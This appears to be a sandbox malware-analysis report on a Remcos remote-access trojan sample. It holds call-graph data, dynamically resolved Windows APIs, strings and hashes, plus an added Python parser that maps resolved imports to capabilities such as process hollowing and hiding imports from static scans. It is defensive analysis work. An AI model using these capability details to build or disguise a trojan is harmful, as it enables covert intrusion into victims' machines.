85221->85228 85223 414244 WSAGetLastError 85689 41bc76 30 API calls 85223->85689 85228->85206 85228->85209 85228->85212 85228->85215 85228->85221 85228->85223 85230 401f66 28 API calls 85228->85230 85232 401d64 28 API calls 85228->85232 85233 404cbf 28 API calls 85228->85233 85234 401d8c 26 API calls 85228->85234 85235 4027cb 28 API calls 85228->85235 85236 43a5e7 42 API calls 85228->85236 85237 405ce6 28 API calls 85228->85237 85239 401eea 26 API calls 85228->85239 85242 4082dc 28 API calls 85228->85242 85245 412513 31 
API calls 85228->85245 85249 41446f 85228->85249 85584 413f9a 85228->85584 85590 4041f1 85228->85590 85597 404915 85228->85597 85612 40428c connect 85228->85612 85672 41a96d GlobalMemoryStatusEx 85228->85672 85673 413683 50 API calls 85228->85673 85674 4047eb WaitForSingleObject 85228->85674 85690 404c9e 28 API calls 85228->85690 85691 440c51 26 API calls 85228->85691 85692 41265d RegOpenKeyExA RegQueryValueExA RegCloseKey 85228->85692 85230->85228 85232->85228 85233->85228 85234->85228 85235->85228 85238 414b80 Sleep 85236->85238 85237->85228 85238->85228 85239->85228 85242->85228 85245->85228 85246 403b40 28 API calls 85246->85249 85249->85228 85249->85246 85250 401d64 28 API calls 85249->85250 85254 41ad46 28 API calls 85249->85254 85256 41aec8 28 API calls 85249->85256 85259 405ce6 28 API calls 85249->85259 85260 40275c 28 API calls 85249->85260 85261 4027cb 28 API calls 85249->85261 85263 401eea 26 API calls 85249->85263 85264 401e13 26 API calls 85249->85264 85267 401f66 28 API calls 85249->85267 85268 41a686 79 API calls 85249->85268 85269 414b22 CreateThread 85249->85269 85693 40cbf1 6 API calls 85249->85693 85694 41adee 28 API calls 85249->85694 85696 41aca0 GetLastInputInfo GetTickCount 85249->85696 85697 41ac52 30 API calls ___scrt_fastfail 85249->85697 85698 40e679 29 API calls 85249->85698 85699 4027ec 28 API calls 85249->85699 85700 404468 59 API calls _Yarn 85249->85700 85701 4045d5 111 API calls ___std_exception_copy 85249->85701 85702 40a767 84 API calls 85249->85702 85251 4144ed GetTickCount 85250->85251 85695 41ad46 28 API calls 85251->85695 85254->85249 85256->85249 85259->85249 85260->85249 85261->85249 85263->85249 85264->85249 85267->85249 85268->85249 85269->85249 85727 419e89 103 API calls 85269->85727 85270->84704 85271->84714 85274 4085c0 85273->85274 85275 402e78 28 API calls 85274->85275 85276 4085e4 85275->85276 85276->84735 85278 4124e1 RegQueryValueExA RegCloseKey 85277->85278 85279 41250b 85277->85279 85278->85279 85279->84731 
85280->84738 85281->84767 85282->84760 85283->84751 85284->84765 85286 40c8ba 85285->85286 85287 40c8da 85286->85287 85288 40c90f 85286->85288 85290 40c8d0 85286->85290 85728 41a74b 29 API calls 85287->85728 85291 41b15b 2 API calls 85288->85291 85289 40ca03 GetLongPathNameW 85293 403b40 28 API calls 85289->85293 85290->85289 85294 40c914 85291->85294 85296 40ca18 85293->85296 85297 40c918 85294->85297 85298 40c96a 85294->85298 85295 40c8e3 85299 401e18 26 API calls 85295->85299 85300 403b40 28 API calls 85296->85300 85302 403b40 28 API calls 85297->85302 85301 403b40 28 API calls 85298->85301 85303 40c8ed 85299->85303 85304 40ca27 85300->85304 85305 40c978 85301->85305 85306 40c926 85302->85306 85307 401e13 26 API calls 85303->85307 85731 40cc37 28 API calls 85304->85731 85311 403b40 28 API calls 85305->85311 85312 403b40 28 API calls 85306->85312 85307->85290 85309 40ca3a 85732 402860 28 API calls 85309->85732 85314 40c98e 85311->85314 85315 40c93c 85312->85315 85313 40ca45 85733 402860 28 API calls 85313->85733 85730 402860 28 API calls 85314->85730 85729 402860 28 API calls 85315->85729 85319 40ca4f 85323 401e13 26 API calls 85319->85323 85320 40c999 85324 401e18 26 API calls 85320->85324 85321 40c947 85322 401e18 26 API calls 85321->85322 85326 40c952 85322->85326 85327 40ca59 85323->85327 85325 40c9a4 85324->85325 85328 401e13 26 API calls 85325->85328 85329 401e13 26 API calls 85326->85329 85330 401e13 26 API calls 85327->85330 85332 40c9ad 85328->85332 85333 40c95b 85329->85333 85331 40ca62 85330->85331 85334 401e13 26 API calls 85331->85334 85335 401e13 26 API calls 85332->85335 85336 401e13 26 API calls 85333->85336 85337 40ca6b 85334->85337 85335->85303 85336->85303 85338 401e13 26 API calls 85337->85338 85339 40ca74 85338->85339 85340 401e13 26 API calls 85339->85340 85341 40ca7d 85340->85341 85341->84813 85342->84826 85343->84847 85344->84806 85345->84840 85346->84876 85347->84885 85348->84909 85349->84897 85350->84931 85352 401e0c 85351->85352 
85353->84758 85356 40e183 85355->85356 85357 41a65c LoadResource LockResource SizeofResource 85355->85357 85356->84987 85357->85356 85359 401f8e 85358->85359 85360 402325 28 API calls 85359->85360 85361 401fa4 85360->85361 85361->84991 85363 401f86 28 API calls 85362->85363 85364 406066 85363->85364 85364->84998 85366 40250d 85365->85366 85368 40252b 85366->85368 85369 40261a 28 API calls 85366->85369 85368->85002 85369->85368 85370->85004 85372 41bfae 85371->85372 85373 41bfd2 85372->85373 85374 41bfcb 85372->85374 85379 41c552 85373->85379 85398 41bfe3 28 API calls 85374->85398 85376 41bfd0 85376->85004 85378->85013 85380 41c55c __EH_prolog 85379->85380 85381 41c673 85380->85381 85382 41c595 85380->85382 85405 402649 28 API calls std::_Xinvalid_argument 85381->85405 85399 4026a7 28 API calls 85382->85399 85386 41c5a9 85400 41c536 28 API calls 85386->85400 85388 41c5dc 85389 41c603 85388->85389 85390 41c5f7 85388->85390 85402 41c7cf 26 API calls 85389->85402 85401 41c7b2 26 API calls 85390->85401 85393 41c601 85404 41c75a 26 API calls 85393->85404 85394 41c60f 85403 41c7cf 26 API calls 85394->85403 85397 41c63e 85397->85376 85398->85376 85399->85386 85400->85388 85401->85393 85402->85394 85403->85393 85404->85397 85406->85027 85407->85031 85408->85033 85411 402e85 85410->85411 85412 402e98 85411->85412 85414 402eae 85411->85414 85415 402ea9 85411->85415 85417 403445 28 API calls 85412->85417 85414->85415 85418 40225b 26 API calls 85414->85418 85415->85042 85417->85415 85418->85415 85420 404bd0 85419->85420 85423 40245c 85420->85423 85422 404be4 85422->85045 85424 402469 85423->85424 85426 402478 85424->85426 85427 402ad3 28 API calls 85424->85427 85426->85422 85427->85426 85428->85049 85430 401e94 85429->85430 85432 41b183 85431->85432 85433 41b168 GetCurrentProcess IsWow64Process 85431->85433 85432->85059 85433->85432 85434 41b17f 85433->85434 85434->85059 85436 412541 RegQueryValueExA RegCloseKey 85435->85436 85437 412569 85435->85437 85436->85437 85438 401f66 
28 API calls 85437->85438 85439 41257e 85438->85439 85439->85062 85440->85070 85441->85081 85460 43a545 85442->85460 85444 43998b 85469 4392de 38 API calls 2 library calls 85444->85469 85446 439950 85446->85444 85447 439965 85446->85447 85459 40dd54 85446->85459 85467 445354 20 API calls __dosmaperr 85447->85467 85449 43996a 85468 43a827 26 API calls _Deallocate 85449->85468 85452 439997 85453 4399c6 85452->85453 85470 43a58a 42 API calls __Toupper 85452->85470 85455 439a32 85453->85455 85471 43a4f1 26 API calls 2 library calls 85453->85471 85472 43a4f1 26 API calls 2 library calls 85455->85472 85457 439af9 _swprintf 85457->85459 85473 445354 20 API calls __dosmaperr 85457->85473 85459->84833 85459->84835 85461 43a54a 85460->85461 85462 43a55d 85460->85462 85474 445354 20 API calls __dosmaperr 85461->85474 85462->85446 85464 43a54f 85475 43a827 26 API calls _Deallocate 85464->85475 85466 43a55a 85466->85446 85467->85449 85468->85459 85469->85452 85470->85452 85471->85455 85472->85457 85473->85459 85474->85464 85475->85466 85480 401e9b 85476->85480 85478 4027d9 85478->85114 85479->85118 85481 401ea7 85480->85481 85482 40245c 28 API calls 85481->85482 85483 401eb9 85482->85483 85483->85478 85485 409855 85484->85485 85486 4124b7 3 API calls 85485->85486 85487 40985c 85486->85487 85488 409870 85487->85488 85489 40988a 85487->85489 85490 4095cf 85488->85490 85491 409875 85488->85491 85492 4082dc 28 API calls 85489->85492 85490->84870 85503 4082dc 85491->85503 85494 409898 85492->85494 85508 4098a5 85 API calls 85494->85508 85498 409888 85498->85490 85499->85144 85517 402d8b 85500->85517 85502 4028dd 85502->85147 85504 4082eb 85503->85504 85509 408431 85504->85509 85506 408309 85507 409959 29 API calls 85506->85507 85507->85498 85514 40999f 130 API calls 85507->85514 85508->85490 85515 4099b5 53 API calls 85508->85515 85516 4099a9 125 API calls 85508->85516 85510 40843d 85509->85510 85512 40845b 85510->85512 85513 402f0d 28 API calls 85510->85513 85512->85506 
                                                                                (Tail of the preceding function's control-flow graph: interactive edge data, not reproduced. The surviving block labels reference socket, WSAStartup, WSASetLastError, WSAGetLastError and closesocket; CreateEventW, CreateEventA and CreateThread; SetEvent, WaitForSingleObject and CloseHandle; GetLocalTime; RegSetValueExA and RegCloseKey; EnterCriticalSection, LeaveCriticalSection and DeleteCriticalSection; Sleep; TerminateProcess and ExitProcess.)

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BCF8
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BD01
                                                                                • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD18
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BD1B
                                                                                • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD2D
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BD30
                                                                                • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD41
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BD44
                                                                                • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040D783), ref: 0041BD55
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BD58
                                                                                • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040D783), ref: 0041BD65
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BD68
                                                                                • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D783), ref: 0041BD75
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BD78
                                                                                • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D783), ref: 0041BD85
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BD88
                                                                                • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D783), ref: 0041BD99
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BD9C
                                                                                • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D783), ref: 0041BDA9
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BDAC
                                                                                • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D783), ref: 0041BDBD
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BDC0
                                                                                • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D783), ref: 0041BDD1
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BDD4
                                                                                • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D783), ref: 0041BDE5
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BDE8
                                                                                • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040D783), ref: 0041BDF5
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BDF8
                                                                                • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040D783), ref: 0041BE06
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BE09
                                                                                • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040D783), ref: 0041BE16
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BE19
                                                                                • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040D783), ref: 0041BE2B
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BE2E
                                                                                • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040D783), ref: 0041BE3B
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BE3E
                                                                                • LoadLibraryA.KERNELBASE(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040D783), ref: 0041BE50
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BE53
                                                                                • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040D783), ref: 0041BE60
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BE63
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressProc$HandleLibraryLoadModule
                                                                                • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                                                                • API String ID: 384173800-625181639
                                                                                • Opcode ID: 0789f4e3f810de028ed60e0db8f6a6efc83e65cfda48e5b03c752fe52fb7e632
                                                                                • Instruction ID: 894fbade80705e672e772900be83df88f70523cf1842e1027a1ce5ee2e2841b6
                                                                                • Opcode Fuzzy Hash: 0789f4e3f810de028ed60e0db8f6a6efc83e65cfda48e5b03c752fe52fb7e632
                                                                                • Instruction Fuzzy Hash: 2831EDA0E4031C7ADA107FB69C49E5B7E9CD944B953110827B508D3162FBBDA9809EEE

                                                                                Control-flow Graph

                                                                                (Control-flow graph of the function at 0040D767: interactive block/edge data, not reproduced. The entry block 40d767-40d7e9 calls 41bce3, the API resolver listed above, and then GetModuleFileNameW; later blocks call StrToIntA, SetProcessDEPPolicy, CreateThread several times, Sleep and DeleteFileW, with executed and not-executed blocks distinguished only in the interactive view.)
                                                                                APIs
                                                                                  • Part of subcall function 0041BCE3: LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BCF8
                                                                                  • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD01
                                                                                  • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD18
                                                                                  • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD1B
                                                                                  • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD2D
                                                                                  • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD30
                                                                                  • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD41
                                                                                  • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD44
                                                                                  • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040D783), ref: 0041BD55
                                                                                  • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD58
                                                                                  • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040D783), ref: 0041BD65
                                                                                  • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD68
                                                                                  • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D783), ref: 0041BD75
                                                                                  • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD78
                                                                                  • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D783), ref: 0041BD85
                                                                                  • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD88
                                                                                  • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D783), ref: 0041BD99
                                                                                  • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD9C
                                                                                  • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D783), ref: 0041BDA9
                                                                                  • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDAC
                                                                                  • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D783), ref: 0041BDBD
                                                                                  • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDC0
                                                                                  • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D783), ref: 0041BDD1
                                                                                  • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDD4
                                                                                  • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D783), ref: 0041BDE5
                                                                                  • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDE8
                                                                                  • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040D783), ref: 0041BDF5
                                                                                  • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDF8
                                                                                  • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040D783), ref: 0041BE06
                                                                                • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe,00000104), ref: 0040D790
                                                                                  • Part of subcall function 0040FCBA: __EH_prolog.LIBCMT ref: 0040FCBF
                                                                                Strings
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                                                                • String ID: 0DG$@CG$@CG$Access Level: $Administrator$C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe$Exe$Exe$Inj$Remcos Agent initialized$Rmc-GJDISH$Software\$User$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$`=G$dCG$del$del$exepath$licence$license_code.txt$BG$BG$BG$BG$BG
                                                                                • API String ID: 2830904901-310086955
                                                                                • Opcode ID: 23bab16b0a32835fc41408796fbaf142d12239376e5a44b2dd1f76423c1949f1
                                                                                • Instruction ID: 4071723a11783d2da8da933f82134b9c6f3815e49c8d87d463163304bf45e319
                                                                                • Opcode Fuzzy Hash: 23bab16b0a32835fc41408796fbaf142d12239376e5a44b2dd1f76423c1949f1
                                                                                • Instruction Fuzzy Hash: 4032A360B043406ADA18B776DC57BBE269A8FC1748F04443FB8467B2E2DE7C9D45839E
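                                                                                Both API listings above (the resolver at 0041BCE3 and its repeat as "Part of subcall function" lines under 0040D767) show the same pattern: a LoadLibraryA or GetModuleHandleA call whose next stack value is the export name, immediately followed by GetProcAddress. The sample never imports these functions statically, so the import table alone would not reveal NtUnmapViewOfSection, NtSuspendProcess or GetExtendedTcpTable. The parser below is an added example for this page and is not part of the Joe Sandbox report or of the sample; it reads report lines in exactly the format printed above (the constructed sample input is a subset copied from the listing), pairs each loader call with its GetProcAddress, collapses the repeated subcall lines on the call-site address, treats an 8-hex-digit "name" such as the Shlwapi 0000000C entry as an ordinal, and attaches capability labels that are the editor's own reading, not something the report asserts.

```python
import re
from collections import OrderedDict

# Constructed sample input: API-call lines copied from the report listing for the
# resolver function at 0041BCE3, plus one "Part of subcall function" repeat of the
# kind that appears in the 0040D767 listing. Only a subset of the page's lines.
SAMPLE_LINES = """\
• LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BCF8
• GetProcAddress.KERNEL32(00000000), ref: 0041BD01
• GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD18
• GetProcAddress.KERNEL32(00000000), ref: 0041BD1B
• LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040D783), ref: 0041BD55
• GetProcAddress.KERNEL32(00000000), ref: 0041BD58
• GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D783), ref: 0041BD75
• GetProcAddress.KERNEL32(00000000), ref: 0041BD78
• LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040D783), ref: 0041BE06
• GetProcAddress.KERNEL32(00000000), ref: 0041BE09
• GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040D783), ref: 0041BE2B
• GetProcAddress.KERNEL32(00000000), ref: 0041BE2E
• LoadLibraryA.KERNELBASE(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040D783), ref: 0041BE50
• GetProcAddress.KERNEL32(00000000), ref: 0041BE53
• Part of subcall function 0041BCE3: LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BCF8
"""

# One report line: optional subcall prefix, API.MODULE(args), ref: call-site address.
CALL_RE = re.compile(
    r"(?:Part of subcall function [0-9A-Fa-f]{8}: )?"
    r"(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>[^)]*)\), ref: (?P<ref>[0-9A-Fa-f]{8})"
)

# Analyst's own reading of what each resolved export gives the sample. These labels
# are an assumption added for this example, not something the report states.
CAPABILITY_HINTS = {
    "NtUnmapViewOfSection": "unmap a section in a target process (process-hollowing primitive)",
    "NtSuspendProcess": "suspend another process",
    "NtResumeProcess": "resume another process",
    "GetExtendedTcpTable": "enumerate TCP connections",
    "GetExtendedUdpTable": "enumerate UDP endpoints",
    "GetProcessImageFileNameW": "resolve image paths of other processes",
    "IsUserAnAdmin": "check for administrator rights",
    "IsWow64Process": "check process bitness",
    "SetProcessDEPPolicy": "change the process DEP policy",
}


def parse_resolved_imports(report_text):
    """Return one record per LoadLibraryA/GetModuleHandleA call, paired with the
    GetProcAddress call that follows it. In the report the export name (or an
    8-hex-digit ordinal, as for Shlwapi) is the second stack value shown. Records
    are keyed on the call-site address, so repeated 'Part of subcall function'
    lines collapse into the entry they duplicate."""
    records = OrderedDict()
    pending = None
    for raw in report_text.splitlines():
        m = CALL_RE.match(raw.strip().lstrip("•").strip())
        if not m:
            continue
        api, ref = m.group("api"), m.group("ref")
        args = m.group("args").split(",")
        if api in ("LoadLibraryA", "GetModuleHandleA") and len(args) >= 2:
            name = args[1]
            by_ordinal = re.fullmatch(r"[0-9A-Fa-f]{8}", name) is not None
            records.setdefault(ref, {
                "loader": api,
                "library": args[0].lower(),
                "export": None if by_ordinal else name,
                "ordinal": int(name, 16) if by_ordinal else None,
                "ref": ref,
                "getprocaddress_ref": None,
            })
            pending = records[ref]
        elif api == "GetProcAddress" and pending is not None:
            if pending["getprocaddress_ref"] is None:
                pending["getprocaddress_ref"] = ref
            pending = None
    return list(records.values())


def summarize(records):
    """Condense the records into what a triage note needs: libraries touched,
    exports resolved by name, ordinal-only resolutions, capability hints, and any
    loader call not followed by GetProcAddress (worth a second look in the graph)."""
    exports = [r["export"] for r in records if r["export"]]
    return {
        "libraries": sorted({r["library"] for r in records}),
        "exports": exports,
        "ordinals": [(r["library"], r["ordinal"]) for r in records if r["ordinal"] is not None],
        "hints": OrderedDict((e, CAPABILITY_HINTS[e]) for e in exports if e in CAPABILITY_HINTS),
        "unpaired": [r["ref"] for r in records if r["getprocaddress_ref"] is None],
    }


if __name__ == "__main__":
    recs = parse_resolved_imports(SAMPLE_LINES)
    summary = summarize(recs)
    print(f"{len(recs)} dynamic resolutions across {len(summary['libraries'])} libraries")
    for r in recs:
        target = r["export"] or f"ordinal {r['ordinal']}"
        print(f"  {r['ref']}: {r['loader']}({r['library']}) -> {target}")
    for export, hint in summary["hints"].items():
        print(f"  capability: {export}: {hint}")
```

                                                                                Feeding the full listing instead of the constructed subset yields the complete set of names in the String ID line above; the export names are a convenient seed for a string-based YARA rule, since a static scan of the unpacked image sees them as plain strings even though they never appear in the import directory. The "unpaired" list is a sanity check on the parse rather than a finding: every loader call in this sample is followed by GetProcAddress.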

                                                                                Control-flow Graph

                                                                                APIs
                                                                                  • Part of subcall function 004124B7: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 004124D7
                                                                                  • Part of subcall function 004124B7: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
                                                                                  • Part of subcall function 004124B7: RegCloseKey.KERNELBASE(?), ref: 00412500
                                                                                • Sleep.KERNELBASE(00000BB8), ref: 0040E603
                                                                                • ExitProcess.KERNEL32 ref: 0040E672
                                                                                Strings
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseExitOpenProcessQuerySleepValue
                                                                                • String ID: 5.3.0 Pro$override$pth_unenc$BG
                                                                                • API String ID: 2281282204-3981147832
                                                                                • Opcode ID: a495f52f6d12fdb69eb15e8af719d064a6023c8221cbc3bd1bda5ccd61591161
                                                                                • Instruction ID: 346becae97c590b24629de205d3f766cc2ad037e5fc603921d36f10068cff0f4
                                                                                • Opcode Fuzzy Hash: a495f52f6d12fdb69eb15e8af719d064a6023c8221cbc3bd1bda5ccd61591161
                                                                                • Instruction Fuzzy Hash: 6B21A131B0030027C608767A891BA6F359A9B91719F90443EF805A76D7EE7D8A6083DF

                                                                                Control-flow Graph

                                                                                (Control-flow graph of the function at 00404915: interactive block/edge data, not reproduced. The block at 404942 calls GetLocalTime and builds the keep-alive status string; the block at 404987 calls CreateEventA and CreateThread with Function_00004B1D as the thread start; executed and not-executed blocks are distinguished only in the interactive view.)
                                                                                APIs
                                                                                • GetLocalTime.KERNEL32(?), ref: 00404946
                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00404994
                                                                                • CreateThread.KERNELBASE(00000000,00000000,Function_00004B1D,?,00000000,00000000), ref: 004049A7
                                                                                Strings
                                                                                • KeepAlive | Enabled | Timeout: , xrefs: 0040495C
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Create$EventLocalThreadTime
                                                                                • String ID: KeepAlive | Enabled | Timeout:
                                                                                • API String ID: 2532271599-1507639952
                                                                                • Opcode ID: d4f222445af10bae9fc578e1dd84de5f99209aed2f8721c4e23f231093fcca0f
                                                                                • Instruction ID: c7daaf492e0cec12b0841424890a61be8e5b61f5a3177df3d8f4b9063cedc03f
                                                                                • Opcode Fuzzy Hash: d4f222445af10bae9fc578e1dd84de5f99209aed2f8721c4e23f231093fcca0f
                                                                                • Instruction Fuzzy Hash: 38113AB19042547AC710A7BA8C49BCB7F9C9F86364F00407BF40462192C7789845CBFA
                                                                                APIs
                                                                                • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,00000001,004326C2,00000024,?,?,?), ref: 0043294C
                                                                                • CryptGenRandom.ADVAPI32(?,?,?,?,?,?,?,?,?,0042CBBE,?), ref: 00432962
                                                                                • CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,0042CBBE,?), ref: 00432974
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Crypt$Context$AcquireRandomRelease
                                                                                • String ID:
                                                                                • API String ID: 1815803762-0
                                                                                • Opcode ID: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
                                                                                • Instruction ID: 80435fde6f6b62f03973a002229794bf261f16e8857de4c024377aa862d1bdf3
                                                                                • Opcode Fuzzy Hash: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
                                                                                • Instruction Fuzzy Hash: 11E06D31308211BBEB310E25BC08F573F94AF89B71F71053AB211E40E4C2A188419A1C
                                                                                APIs
                                                                                • GetComputerNameExW.KERNELBASE(00000001,?,0000002B,00474358), ref: 0041A7BF
                                                                                • GetUserNameW.ADVAPI32(?,0040DFC3), ref: 0041A7D7
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
